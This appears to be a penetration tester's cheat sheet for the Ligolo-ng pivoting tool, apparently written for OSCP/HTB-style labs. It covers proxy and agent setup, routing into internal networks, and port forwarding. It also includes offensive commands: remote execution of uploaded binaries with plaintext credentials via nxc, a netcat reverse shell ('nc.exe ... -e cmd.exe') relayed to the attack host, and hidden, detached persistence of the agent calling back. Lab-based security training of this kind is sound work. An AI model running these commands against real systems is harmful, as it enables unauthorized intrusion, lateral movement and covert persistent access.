Ligolo-ng

Pivoting

Launch ligolo-proxy:

• -selfcert for when the environment has no internet availability, e.g. CTFs/labs

• -autocert for when there is internet available on the environment

When -autocert is used, port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval.

./proxy [-selfcert | -autocert] -laddr 0.0.0.0:443

Connect to the proxy from the target machine:

# When -selfcert is used on the proxy
./agent -connect 10.129.204.146:11601:443 -ignore-cert -retry

# When -autocert is used on the proxy
./agent -connect 10.129.204.146:11601:443 -retry

The routing configuration can be done using the autoroute option or step by step following the rest of the tabs:

# Receive the agent connection
ligolo-ng » INFO[0052] Agent joined.   id=0050569e00f6 name="DOMAIN\x7331@MS01" remote="192.168.103.141:49318"

# List active sessions
ligolo-ng » session

# Choose the target session
? Specify a session : 1 - DOMAIN\x7331@MS01 - 192.168.103.141:49318 - 0050569e00f6

# Configure the routing options
[Agent : OSCP\eric.wallows@MS01] » autoroute

# Choose the target network
? Select routes to add: 10.10.63.141/24

# Create a new interface
? Create a new interface or use an existing one? Create a new interface
INFO[0105] Generating a random interface name...
INFO[0105] Using interface name savinglester
INFO[0105] Creating routes for savinglester...

# Start the tunnel via the newly-created interface
? Start the tunnel? Yes
INFO[0106] Starting tunnel to DOMAIN\x7331@MS01 (0050569e00f6)

Port-Forward

1. Routing

To access local ports on the connected agent, ligolo-ng uses a hardcoded "magic" CIDR: 240.0.0.0/4:

$ sudo ip route add 240.0.0.1/32 dev ligolo

2. Interact

Now, any IP queried in this unused subnet is automatically redirected to the agent's 127.0.0.1. For instance, the below scan will scan the target's loopback address (127.0.0.1):

$ nmap 240.0.0.1

Agent Transfer & Execution

We don't need elevated privileges on the target to use the ligolo-agent.

Transfer

$ nxc smb 10.129.204.146 -u Administrator -p 'IpreferanewP@$$' --local-auth --put-file 'agent.exe' '\Windows\Temp\agent.exe'

Execute

$ nxc smb 10.129.204.146 -u Administrator -p 'IpreferanewP@$$' --local-auth -x '\Windows\Temp\agent.exe -connect 10.10.15.223:11601 -ignore-cert'

Reverse Shell

We have a route to the target network, but the target network does not have a route to our attack host. Thus, if we want to catch a reverse shell from a target other than the pivot host:

1. Listener Setup

Create a listener on the agent/pivot host (0.0.0.0:3000) that will redirect the traffic to our proxy/attack host (127.0.0.1:4444).

[Agent : pivot@pivot-machine] >> listener_add --addr 0.0.0.0:3000 --to 127.0.0.1:4444 --tcp
INFO[0373] Listener 0 created on remote agent!

Start listening from our attack host:

$ nc -lvnp 4444
listening on [any] 4444...

2. Connect from Target

Transfer the binary to the target:

nxc mssql 10.10.63.148 -u sql_svc -p Dolphin1 --put-file 'nc.exe' 'c:\windows\temp\nc.exe'

Connect from the target to the pivot machine (10.10.63.147) on the listening port (30000):

$ nxc mssql 10.10.63.148 -u sql_svc -p Dolphin1 -x 'c:\windows\temp\nc.exe 10.10.63.147 3000 -e cmd.exe'

This will connect to the agent's listener and then forwarded to our proxy:

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.237] from (UNKNOWN) [192.168.45.237] 46144
...
C:\Windows\system32>whoami
nt service\mssql$sqlexpress

C:\Windows\system32>hostname
MS02

Persistence

# Linux targets
nohup /tmp/agent -connect 10.10.14.5:443 -ignore-cert > /dev/null 2>&1 &

# Windows targets
Start-Process -FilePath "C:\Windows\Temp\agent.exe" -ArgumentList "-connect 10.10.14.5:443 -ignore-cert" -WindowStyle Hidden

Resources

Documentation

Introduction - Ligolo-ng Documentationdocs.ligolo.ng

Repo

GitHub - nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.GitHub

Video Demo